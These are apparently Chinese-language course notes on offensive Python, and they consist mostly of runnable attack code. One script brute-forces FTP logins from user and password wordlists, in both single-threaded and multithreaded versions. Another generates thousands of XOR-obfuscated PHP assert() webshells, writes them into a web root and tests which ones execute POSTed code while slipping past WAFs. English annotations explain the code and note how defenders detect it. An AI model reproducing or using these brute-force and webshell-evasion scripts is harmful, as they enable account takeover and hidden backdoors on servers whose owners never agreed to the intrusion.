Python开发-多线程Fuzz&Waf异或免杀&爆破
- 本课知识点:协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术
- 学习目的:掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等
利用FTP模块实现协议爆破脚本
- ftplib模块使用
- 遍历用户及密码字典
- 尝试连接执行命令判断
# Author:Serena
import ftplib
#简单的模拟登录测试
#爆破:IP、端口、用户名、密码字典
def ftp_brute():
    """Try every user/password pair from two wordlists against one FTP host.

    Reads ``ftp-user.txt`` and ``ftp-pwd.txt`` (one entry per line) from the
    working directory, reconnects to the hard-coded address for each pair and
    prints ``user|pass| ok`` plus a directory listing when ``login`` succeeds.
    Failed pairs are swallowed silently. Seen from the server, this loop is
    one TCP connect plus one failed USER/PASS per pair in quick succession,
    which is exactly the pattern FTP failed-login monitoring, account
    lockout and per-IP rate limiting are designed to catch.
    """
    ftp = ftplib.FTP()
    for username in open('ftp-user.txt'):
        # The password file is reopened once per username and never
        # explicitly closed; the handles are left to the garbage collector.
        for password in open('ftp-pwd.txt'):
            username = username.replace('\n','')
            password = password.replace('\n','')
            # print(username+'|'+password)
            try:
                # Fresh connect for every attempt; address and port are
                # hard-coded (a private 192.168.x.x address).
                ftp.connect('192.168.56.110', 21)
                ftp.login(username,password)
                print(username+'|'+password+'| ok')
                # Directory listing of the FTP root after a successful login.
                # NOTE: ``retrlines`` prints the listing lines through its
                # default callback and returns only the final server
                # response string; the local name shadows the builtin ``list``.
                list = ftp.retrlines('list')
                print(list)
            except ftplib.all_errors:
                # Any ftplib/socket error (bad credentials, refused
                # connection, timeout) is ignored and the next pair is tried.
                pass
if __name__ == '__main__':
    # Script entry point: run the single-threaded loop with no arguments;
    # host, port and wordlist names are all fixed inside ftp_brute().
    ftp_brute()
多线程
# Author:Serena
import ftplib,sys,queue,threading
#简单的模拟登录测试
#爆破:IP、端口、用户名、密码字典
import queue
import threading
def ftp_brute(ip,port):
    """Worker body for one thread: drain the global queue ``q`` of
    ``"user|password"`` strings and try each pair on a single FTP connection.

    Args:
        ip: FTP server address, passed straight to ``FTP.connect``.
        port: FTP server port (int).

    ``q`` is a module-level name created in the ``__main__`` block, not a
    parameter, so this function only works when the file is run as a script.
    Unlike the single-threaded version, the connection is opened once per
    thread and only ``login`` is repeated per pair; the socket is never
    explicitly closed. On the server side this appears as N concurrent
    connections each issuing many USER/PASS pairs — the signature that
    failed-login alerting and per-IP rate limiting target.
    """
    ftp = ftplib.FTP()
    ftp.connect(ip,port)
    # ``empty()`` followed by ``get()`` is a check-then-act race between
    # threads; a thread that loses it blocks on ``get()`` indefinitely
    # because nothing ever signals the queue as finished.
    while not q.empty():
        dict = q.get()   # shadows the builtin ``dict``
        dict = dict.split('|')
        username = dict[0]
        password = dict[1]
        try:
            ftp.login(username,password)
            print(username+'|'+password+'| ok')
            # Directory listing of the FTP root after a successful login.
            # ``retrlines`` prints the listing via its default callback and
            # returns only the final server response; ``list`` shadows the
            # builtin.
            list = ftp.retrlines('list')
            print(list)
        except ftplib.all_errors:
            print(username + '|' + password + '| no')
            pass   # redundant after the print above
if __name__ == '__main__':
    # Usage: python3 test.py <ip> <port> <userfile> <passfile> <threads>
    # All five positional arguments are required and unvalidated: a missing
    # one raises IndexError, a non-numeric port or thread count ValueError.
    ip = sys.argv[1]
    port = int(sys.argv[2])
    userfile = sys.argv[3]
    passfile = sys.argv[4]
    threading_num = int(sys.argv[5])
    # Shared work queue read by every ftp_brute thread (module-level global).
    q = queue.Queue()
    # Build the full user x password cross product up front. The password
    # file is reopened once per username and the handles are never closed.
    for username in open(userfile):
        for password in open(passfile):
            username = username.replace('\n','')
            password = password.replace('\n','')
            # print(username+'|'+password)
            q.put(username + '|' + password)
    # Start the worker threads. They are not joined; the interpreter only
    # exits once every non-daemon thread has returned.
    for x in range(threading_num):
        t = threading.Thread(target=ftp_brute,args=(ip,port))
        t.start()
# Command line used in the course: python3 test.py 192.168.56.110 21 ftp-user.txt ftp-pwd.txt 10
# Possible refinement noted by the author: stop once the correct username/password has been found
配合Fuzz实现免杀异或shell脚本
- 免杀异或shell原理讲解及开发思路(参考及举例:!^@,"^?等)
- 基于Fuzz思路生成大量Payload代码并有序命名写入网站文件中
- 基于多线程实现批量访问shell文件并提交测试是否正常连接回显
# Author:Serena
import time
import requests
import threading,queue
def bypass_check():
    """Worker body for one thread: pull generated file names from the global
    queue ``q`` and POST to each one on the local test server.

    Each request sends ``phpinfo();`` as form data to
    ``http://127.0.0.1:8081/x/<filename>`` and prints ``ok`` when the
    response body contains ``XIAODI-PC`` (presumably the hostname that
    phpinfo() reports on the author's test machine), ``no`` otherwise.
    Requires ``q`` to be defined by the ``__main__`` block. The request has
    no timeout and no error handling, so a connection failure raises and
    ends the thread; a one-second pause follows every request.
    """
    # Same check-then-act race as any ``empty()``/``get()`` loop: a thread
    # that loses the race blocks on ``get()`` for good.
    while not q.empty():
        filename = q.get()
        url = "http://127.0.0.1:8081/x/" + filename
        datas = {
            'x ': 'phpinfo();'
        }
        # No timeout= on the request; a hung server hangs this thread.
        result = requests.post(url, data=datas).content.decode('utf-8')
        if "XIAODI-PC" in result:
            print('check ->' + filename+'->ok')
        else:
            print('check ->' + filename + '->no')
        time.sleep(1)
if __name__ == '__main__':
    # Shared queue of generated file names, consumed by bypass_check threads.
    q = queue.Queue()
    # Generate one PHP file per pair of character codes 1..126. Each file
    # builds a function name by XOR-ing two single-character strings and
    # appending the literal 'ssert', then calls it on the ``x`` POST
    # parameter — an obfuscated assert()-style backdoor. Files are written
    # directly into the local web root. From the defender's side, bulk
    # creation of new .php files under the web root and the
    # ``$_POST`` -> dynamic-call pattern are what file-integrity monitoring
    # and webshell scanners look for.
    for i in range(1,127):
        for ii in range(1, 127):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            # 'a+' appends rather than overwrites an existing file.
            with open('D:/phpstudy/WWW/x/' + filename, 'a+') as f:
                f.write(code)
    print("Fuzz文件生成成功")
    # 20 checker threads share the queue; they are never joined.
    for x in range(20):
        t = threading.Thread(target=bypass_check)
        t.start()
资源
- fuzzdb(https://github.com/zhanye/fuzzdb)
- fuzzDicts(https://github.com/stemmm/fuzzDicts)
- Webshell免杀绕过waf(https://www.cnblogs.com/liujizhou/p/11806497.html)
- python ftplib模块(https://www.cnblogs.com/kaituorensheng/p/4480512.html)
- PHP异或(https://blog.csdn.net/qq_41617034/article/details/104441032)